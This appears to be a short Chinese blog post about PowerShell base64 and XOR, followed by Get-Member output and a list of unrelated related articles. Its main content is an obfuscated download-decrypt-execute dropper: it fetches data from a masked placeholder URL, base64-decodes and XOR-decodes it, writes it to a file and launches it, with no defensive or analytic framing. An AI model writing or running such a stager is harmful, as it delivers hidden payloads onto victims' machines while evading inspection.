powershell base64 xor

原創 lacoucou 2020-05-21 22:46

下載解密執行一條龍: 

$b=$(New-Object Net.WebClient).DownloadString('hxxp://xxx.xx.xx/xx');
$d=[System.Convert]::FromBase64String($b);
$t=New-Object Byte[]($d.Length);
[int]$j=0;
FOR([int]$i=0;$i -lt $d.Length; $i++)
{
    $j+=66;
    $t[$i]=(($d[$i] -bxor ($i*3 -band 255))-$j) -band 255;
}
[io.file]::WriteAllBytes('xx.file',$t);
Start-Process "xx.file"

 

>$d.gettype()
IsPublic IsSerial Name                                     BaseType
-------- -------- ----                                     --------
True     True     Byte[]                                   System.Array
$d | get-Member



   TypeName: System.Byte

Name        MemberType Definition
----        ---------- ----------
CompareTo   Method     int CompareTo(System.Object value), int CompareTo(byte value), int IComparable.CompareTo(System.Object obj), int IComparable[byte].CompareTo(byte other)
Equals      Method     bool Equals(System.Object obj), bool Equals(byte obj), bool IEquatable[byte].Equals(byte other)
GetHashCode Method     int GetHashCode()
GetType     Method     type GetType()
GetTypeCode Method     System.TypeCode GetTypeCode(), System.TypeCode IConvertible.GetTypeCode()
ToBoolean   Method     bool IConvertible.ToBoolean(System.IFormatProvider provider)
ToByte      Method     byte IConvertible.ToByte(System.IFormatProvider provider)
ToChar      Method     char IConvertible.ToChar(System.IFormatProvider provider)
ToDateTime  Method     datetime IConvertible.ToDateTime(System.IFormatProvider provider)
ToDecimal   Method     decimal IConvertible.ToDecimal(System.IFormatProvider provider)
ToDouble    Method     double IConvertible.ToDouble(System.IFormatProvider provider)
ToInt16     Method     int16 IConvertible.ToInt16(System.IFormatProvider provider)
ToInt32     Method     int IConvertible.ToInt32(System.IFormatProvider provider)
ToInt64     Method     long IConvertible.ToInt64(System.IFormatProvider provider)
ToSByte     Method     sbyte IConvertible.ToSByte(System.IFormatProvider provider)
ToSingle    Method     float IConvertible.ToSingle(System.IFormatProvider provider)
ToString    Method     string ToString(), string ToString(string format), string ToString(System.IFormatProvider provider), string ToString(string format, System.IFormatProvider provid...
ToType      Method     System.Object IConvertible.ToType(type conversionType, System.IFormatProvider provider)
ToUInt16    Method     uint16 IConvertible.ToUInt16(System.IFormatProvider provider)
ToUInt32    Method     uint32 IConvertible.ToUInt32(System.IFormatProvider provider)
ToUInt64    Method     uint64 IConvertible.ToUInt64(System.IFormatProvider provider)

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

智能的PHP開發工具PhpStorm v2024.1全新發布——支持PHPUnit 11.0

PhpStorm是一個輕量級且便捷的PHP IDE,其旨在提高用戶效率,可深刻理解用戶的編碼,提供智能代碼補全,快速導航以及即時錯誤檢查。可隨時幫助用戶對其編碼進行調整,運行單元測試或者提供可視化debug功能。 立即獲取PhpStorm

原創 2024-05-24 12:20:21

Powershell遠程管理服務器&客戶端(非mstsc遠程連接)

Powershell遠程管理採用一種新的通信協議,Web Services for Management,簡稱WS-MAN它通過http或者https進行工作,WS-WAN的實現主要基於一個後臺服務:Windows遠程管理(Win

osc_pjx77r92 2024-05-14 00:41:15

CTF中常見的四種python逆向

說在前面: 什麼是pyc文件? pyc是一種二進制文件,是由py文件經過編譯後,生成的文件,是一種byte code,py文件變成pyc文件後,加載的速度有所提高,pyc 文件是 Python 編譯過的字節碼文件。它是 Python 程

原創 2024-04-19 10:46:19

setp1: 安裝rbenv <<< rbenv for Windows在命令行上安裝管理多個Ruby版本

Windows 11 23H2 安裝 PowerShell終端 在終端中運行: # 自定義你想安裝到的位置,最好不要有空格,因爲沒有測試過 $env:RBENV_ROOT = "C:\Ruby-on-Windows" $s = (

原創 2024-04-09 22:52:06

騰訊雲(CVM)託管進行權限維持

前言 剛好看到一個師傅分享了一個阿里雲ECS實戰攻防,然後想到了同樣利用騰訊雲CVM的託管亦可實現在實戰攻防中的權限維持。 簡介 騰訊雲自動化助手(TencentCloud Automation Tools,TAT)是一個原生運維部署工

原創 2024-04-02 22:46:39

【解決】Windows上erlang/elixir的Hosts文件解析錯誤問題

如果您遇到以下錯誤 args: ["c:/WINDOWS/System32/drivers/etc/hosts",1] format: "inet_parse:~p:~p: erroneous line, SKIPPED~n" labe

原創 2024-02-27 00:21:18

WeOpsV4.5全力打造,儀表盤高級分析傾情推出

WeOpsV4.5又要發佈了,都有哪些新功能呢? 這個版本繼續補齊日誌的功能,除此之外,儀表盤華麗變身,新增高級分析能力也是值得期待的喔!   本次WeOps V4.5版本更新主題總結爲: 1、儀表盤支持高級分析能力,覆蓋監控、告警、工單、

原創 2023-11-06 23:52:41

Win10 代碼行數統計工具CLOC的安裝和使用

window 10 搜索:     powershell 下載安裝cloc https://github.com/AlDanial/cloc/releases 鏈接: https://pan.baidu.com/s/1aXdMsR-Z91I

原創 2023-04-24 22:20:24

windows 安裝fnm node版本管理工具

Using a release binary (Linux/macOS/Windows) Download the latest release binary for your system Make it available glob

原創 2022-12-28 22:05:03

PowerShell隱藏Windows窗口

PowerShell隱藏Windows窗口  啓動PowerShell時隱藏自己的窗口 假如我在計劃任務中定時通過Powershell.exe來執行一個腳本文件,我想隱藏這個窗口,此時我們可以考慮使用PowerShell.exe的選項

原創 2022-04-30 12:01:18

appdynamic monitor schedule task

1 編寫power shell 獲取 task metirces  getStatePut.ps1 $state = Get-ScheduledTask -TaskName "biaoti" | Select-Object State if

原創 2022-04-30 12:01:02

記一次 PC 升級

記一次PC升級 摘要 從這次經歷裏總結一下經驗教訓就是: 動主板前一定要先看說明書,不要憑感覺瞎搞 主板的盒子最好留着,同理買二手主板時儘量選擇箱說全的,CPU 倒無所謂 Intel / AMD 之間切換時系統需要重裝 做好軟件管理,所有

原創 2022-04-30 11:59:35

更改windows遠程桌面端口

通過遠程桌面客戶端連接到計算機(Windows 客戶端或 Windows Server)時,計算機上的遠程桌面功能會通過定義的偵聽端口(默認情況下爲 3389)“偵聽”連接請求。 可以通過修改註冊表來更改 Windows 計算機上的偵聽端口

原創 2022-04-30 06:03:44

How to pass boolean values to a PowerShell script from a command prompt

問題: I have to invoke a PowerShell script from a batch file. 我必須從批處理文件調用PowerShell腳本。 One of the arguments to the scrip

技術盛宴 2021-12-28 21:22:55

win10缺少SNMP服務解決辦法

一,以管理員的身份啓動Powershell 第一步在win10系統任務欄上,點擊搜索圖標,輸入“PowerShell”,如下圖所示: 2 第二步搜索到PowerShell之後,鼠標右鍵以管理員身份運行,如下圖所示:

osc_h8z06jiq 2021-12-25 21:28:44